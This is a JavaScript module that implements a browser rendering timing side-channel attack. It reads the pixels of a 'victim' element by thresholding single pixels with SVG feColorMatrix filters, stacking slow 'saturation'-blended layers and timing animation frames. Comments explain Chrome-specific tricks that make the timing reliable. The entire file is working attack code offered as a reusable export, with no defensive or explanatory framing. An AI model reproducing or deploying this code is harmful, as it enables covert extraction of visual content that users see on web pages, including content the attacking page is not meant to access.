// generate a random RGB color in CSS notation.
function randomColor() {
  function randomByte() {
    return (Math.random() * 256) & 0xFF;
  }
  
  return `rgb(${randomByte()}, ${randomByte()}, ${randomByte()})`;
}

// find the constant part of a feColorMatrix row that forms a sharp cutoff,
// assuming the other four parts add up to 255.
function constant(threshold) {
  // the threshold is sRGB, but SVG filters seem to operate in linear space.
  // I didn't bother to check the spec because I didn't think it was important.
  // let's convert the threshold from sRGB.
  if(threshold <= 0.0031308 * 12.92) {
    threshold /= 12.92;
  } else {
    threshold += 0.055;
    threshold /= 1.055;
    threshold = Math.pow(threshold, 2.4);
  }
  // just some algebra.
  return 1 - 255 * threshold;
}

// one could probably get perceived brightness with SVG filters, but whatever.
function averageValues(threshold) {
  return `85 85 85 0 ${constant(threshold)}  0 0 0 0 0  0 0 0 0 0  0 0 0 0 1`;
}
function redValues(threshold) {
  return `255 0 0 0 ${constant(threshold)}  0 0 0 0 0  0 0 0 0 0  0 0 0 0 1`;
}
function greenValues(threshold) {
  return `0 255 0 0 ${constant(threshold)}  0 0 0 0 0  0 0 0 0 0  0 0 0 0 1`;
}
function blueValues(threshold) {
  return `0 0 255 0 ${constant(threshold)}  0 0 0 0 0  0 0 0 0 0  0 0 0 0 1`;
}
// alpha could be read in the same way.
function alphaValues(threshold) {
  return `0 0 0 255 ${constant(threshold)}  0 0 0 0 0  0 0 0 0 0  0 0 0 0 1`;
}

const rgbValues = Object.create(null);
rgbValues['r'] = redValues;
rgbValues['g'] = greenValues;
rgbValues['b'] = blueValues;

// `element`, so named because it can operate on arbitrary HTML elements.
// actually, it can operate on arbitrary nodes, but elements tend to be the
// most interesting.
export default function element(victim, calibrator, pattern, options) {
  options = options || {};
  
  // Chrome is very finicky when it comes to timing. these two workarounds
  // are necessary when targeting it:
  let { useSoftwareify, useDoubleFrame } = options;
  if(useSoftwareify === undefined) {
    // the 'softwareify' filter is needed to make Chrome do its rasterization
    // on the CPU. GPU-side pixel calculations are bad for timing attacks,
    // but just applying an SVG filter to the element moves its rendering to
    // the CPU.
    useSoftwareify = navigator.userAgent.indexOf('Chrome/') !== -1;
  }
  if(useDoubleFrame === undefined) {
    // this one's weird! the performance hit of rendering wasn't being reported
    // until the next frame on Chrome. I resolved this by forcing it to render
    // the same frame twice. I did this instead of just reporting late
    // because 1. it's less ugly and 2. it seems to produce less noise. it's
    // obviously slower, though.
    useDoubleFrame = navigator.userAgent.indexOf('Chrome/') !== -1;
  }
  
  // We tend to get strange results if we try to calibrate while the content's
  // still loading. If we happen to get a 'load' event (I don't know if that
  // will even happen), we'll start then, but otherwise we'll wait this many
  // milliseconds.
  let { waitTimeForLoad } = options;
  if(waitTimeForLoad === undefined) {
    waitTimeForLoad = 0;
  }
  
  // the "arena" is the rectangle in which the timing-influencing elements are
  // rendered.
  // a larger arena produces more reliable results at the cost of speed.
  const arenaWidth = options.arenaWidth || 1024;
  const arenaHeight = options.arenaHeight || arenaWidth;
  // a large arena isn't enough, however, considering limits on screen size.
  // we need to layer a bunch of costly elements on top of each other to get
  // a significant speed difference.
  // the tradeoff is the same. it's kind of like an "arenaDepth".
  const layerCount = options.layerCount || 20;
  // the number of renders to perform before starting in order to account
  // for clients with different draw performance.
  const calibrationSteps = options.calibrationSteps || 20;
  
  // the scratch space where we perform our timing tests.
  // it needs to be visible but unobtrusive.
  const scratch = document.createElement('div');
  scratch.style.position = 'fixed';
  scratch.style.left = scratch.style.top = '0';
  scratch.style.opacity = '0.1';
  scratch.style.setProperty('z-index', '9999');
  scratch.style.setProperty('pointer-events', 'none');
  scratch.innerHTML = `
    <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="0" height="0">
      <defs>
        <!-- The read-pixel filter converts the entire area to either red or black based on one pixel's color. -->
        <filter id="read-pixel" filterUnits="userSpaceOnUse" x="0" y="0" width="${arenaWidth}" height="${arenaHeight}">
          <feColorMatrix x="0" y="0" width="1" height="1" type="matrix" values="${averageValues(0.5)}" />
          <feTile />
        </filter>
        <!-- It doesn't matter what the softwareify filter does. -->
        <filter id="softwareify" filterUnits="userSpaceOnUse" x="0" y="0" width="${arenaWidth}" height="${arenaHeight}">
          <feColorMatrix x="0" y="0" width="1" height="1" type="matrix" values="1 0 0 0 0  0 1 0 0 0  0 0 1 0 0  -1 0 1 0 0" />
          <feTile />
        </filter>
      </defs>
    </svg>
    <!-- What can I say? It's a canvas. -->
    <canvas width="${arenaWidth}" height="${arenaHeight}"></canvas>
    <div style="isolation: isolate; position: absolute; left: 0; top: 0;">
      <div style="filter: url(#read-pixel); position: absolute; left: 0; top: 0;"></div>
    </div>
  `;
  // I stuck a canvas in there because Chrome wasn't working without one.
  // it just doesn't pay to dwell on these things when you have a bug report to
  // file, you know? like, whatever, man. if it needs a canvas, give it one.
  scratch.getElementsByTagName('canvas')[0].getContext('2d').fillRect(0, 0, arenaWidth, arenaHeight);
  const feColorMatrix = scratch.getElementsByTagName('feColorMatrix')[0];
  // the laboratory is where we put the layers.
  const laboratory = scratch.getElementsByTagName('div')[0];
  if(useSoftwareify) {
    laboratory.style.filter = 'url(#softwareify)';
  }
  // the container is where we put the victim.
  const container = laboratory.getElementsByTagName('div')[0];
  
  for(let i = 0; i < layerCount; ++i) {
    const layer = document.createElement('div');
    layer.style.backgroundColor = randomColor();
    layer.style.position = 'absolute';
    layer.style.left = '0';
    layer.style.top = '0';
    layer.style.width = arenaWidth + 'px';
    layer.style.height = arenaHeight + 'px';
    // the saturation blend mode is fast on pure black and slow on colors.
    // there are probably other blend modes with similar vulnerabilities.
    layer.style.setProperty('mix-blend-mode', 'saturation');
    laboratory.appendChild(layer);
  }
  
  // this will let us cancel the job later.
  let callbackID;
  // this is to make sure we don't try to start the job more than once.
  // it will also allow us to cancel the job before it starts.
  let doRunBegin = true;
  
  // let the browser render a frame, then pass the time taken into a callback.
  function receive(lastTime, callback) {
    callbackID = requestAnimationFrame(currentTime => {
      callback(currentTime, currentTime - lastTime);
    });
  }
  if(useDoubleFrame) {
    // urgh...
    receive = function receive(lastTime, callback) {
      callbackID = requestAnimationFrame(lastTime => {
        container.nextElementSibling.style.backgroundColor = randomColor();
        
        callbackID = requestAnimationFrame(() => {
          callbackID = requestAnimationFrame(currentTime => {
            callback(currentTime, currentTime - lastTime);
          });
        });
      });
    };
  }
  
  // the scratch space needs to be in the document to be rendered, of course!
  document.body.appendChild(scratch);
  
  // calibration takes a while.
  container.appendChild(victim);
  
  function begin() {
    if(!doRunBegin) {
      return;
    }
    doRunBegin = false;
    
    let iterations = 0, totalCalibrationTime = 0;
    callbackID = requestAnimationFrame(function step(currentTime) {
      ++iterations;
      
      // we want a good balance of black and white, so we ask the calibrator
      // for each one specifically, alternating.
      // how it gets them to us is none of our concern! thank goodness.
      const settings = calibrator.set((iterations & 1) ? 'black' : 'white');
      
      // move to read the pixel the calibrator told us to read, with the threshold
      // it gave us.
      feColorMatrix.setAttribute('x', settings.x |0);
      feColorMatrix.setAttribute('y', settings.y |0);
      feColorMatrix.setAttribute('values', averageValues((+settings.value) || 0));
      
      // that will trigger a render, so now we just have to wait to receive a
      // signal back.
      receive(currentTime, (currentTime, timeSpent) => {
        totalCalibrationTime += timeSpent;
        
        if(iterations < calibrationSteps * 2) {
          step(currentTime);
        } else {
          // we're finally done calibrating.
          const averageTime = totalCalibrationTime / (calibrationSteps * 2);
          
          // let the calibrator clean itself up, e.g. remove overlays it was using
          // to make sure the pixels we were just reading were of the colors we
          // expected.
          calibrator.finish();
          
          // and now we just have to follow the pattern.
          
          let next = pattern.next();
          
          (function step(currentTime) {
            if(next.done) {
              // the pattern has ended. now we just have to clean up.
              
              const parent = scratch.parentNode;
              if(parent) {
                parent.removeChild(scratch);
              }
              
              return;
            }
            
            const { x, y, z, channel } = next.value;
            const values = (rgbValues[channel] || averageValues)(z);
            
            feColorMatrix.setAttribute('x', x);
            feColorMatrix.setAttribute('y', y);
            feColorMatrix.setAttribute('values', values);
            
            receive(currentTime, (currentTime, timeSpent) => {
              next = pattern.next(timeSpent > averageTime);
              step(currentTime);
            });
          })(currentTime);
        }
      });
    });
  }
  
  if(waitTimeForLoad <= 0) {
    // using a timeout will just waste time here!
    begin();
  } else {
    // we can call `begin` twice because doRunBegin will cause it to cancel
    // itself if it's been called before.
    victim.addEventListener('load', begin);
    setTimeout(begin, waitTimeForLoad);
  }
  
  return {
    cancel() {
      doRunBegin = false;
      cancelAnimationFrame(callbackID);
      
      const parent = scratch.parentNode;
      if(parent) {
        parent.removeChild(scratch);
      }
    },
  };
};
